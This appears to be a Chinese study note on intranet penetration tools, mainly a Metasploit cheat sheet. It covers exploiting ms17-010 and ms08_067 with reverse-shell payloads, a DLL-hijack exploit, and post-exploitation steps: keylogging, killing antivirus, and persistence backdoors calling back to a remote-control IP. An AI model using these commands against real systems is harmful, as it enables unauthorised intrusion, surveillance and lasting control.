内网安全-readme
内网工具说明
fscan
Metaspolit
历史:2003年,使用Perl-Ruby语言编写。
七大模块:auxiliary/encoders/evasion/exploits/nops/payloads/post
辅助/编码器/免杀/漏洞利用/空指令/攻击载荷/后渗透
#所有命令
banner 显示exp数量信息
msfconsole 打开
help 帮助
back 返回
info 查看该模块的详细信息
jobs 显示任务清单
kill 杀死任务
route 代理跳板
search 搜索ms12-020
session 显示会话
set 设置参数
unset 取消设置
show options 显示选项
use 用该模块
db_connect 数据库相关设置
登录kali——执行service postgresql start/status——msfconsole——db_status——workspace -a/d test——workspace test。
host 查看扫描主机
db_services 查看扫描结果
#常用命令:search/use/set/info/show/?/back/exit/quit
#使用示例:search ms12-020
use auxiliary-----------
show options
set RHOST----------
run
#使用示例:ms17-010
扫描出肉鸡 auxiliary/scan/smb/ms17-010
漏洞利用 exploits/windows/ms17-010
获得session meterpreter相关命令
信息收集模块
whois qq.com
nmap -sS
use auxiliary/scanner/服务名/版本 例子:use auxiliary/scanner/smb/smb_version
扫描网站中的email地址 use auxiliary/gather/search_email_collector set DOMAN sohu.com run
ftp密码嗅探 use auxiliary/sniffer/psnuffle run
密码爆破模块
search ssh_login
选择auxiliary/scanner/...
use
漏洞利用模块
#ms10_002/ms10_018/ms12_020/ms10_046/ms08_067
#攻击端
search ms08_067
use
set payload windows/meterpreter or shell/reverse_tcp
set...
exploit
#客户端浏览器访问URL
#攻击端
sessions -i 2
#dll注入攻击
use exploit/windows/browser/webdav_dll_hijacker
set payload windows/meterpreter/bind_tcp
set SRVHOST、LHOST、LPORT、RHOST
exploit
shellcode使用及免杀
#msf介绍与配置?
payload 攻击载荷
shellcode 木马服务端
listener组件 监听器
服务端?侦听端?
Meterpreter后渗透模块
基本命令:
? 帮助
screenshot 截屏
keyscan_start keyscan_dump 监控键盘记录
寄生进程 migrate 616
进程迁移 run post/windows/manage/migrate
关闭杀软 run killav 关闭cmd
关闭进程 kill 320(可杀360)
捕获流量 run packetrecorder -i 1
提取系统信息 run scraper
持久控制一_写入注册表(XP)
步骤:安装后门run persistence -X -i 50 -p 1211 -r 远控IP
服务端监听msfconsole use exploit/multi/handler ......exploit
持久控制二_(03/08/12)
步骤:安装后门run metsvc -A
服务端监听msfconsole use exploit/multi/handler ......exploit
kali
hydra:爆破ssh/rdp等
Tor:https://www.kali.org/docs/tools/tor/
CS
Cobalt Strike、Armitage、viper、empire

浙公网安备 33010602011771号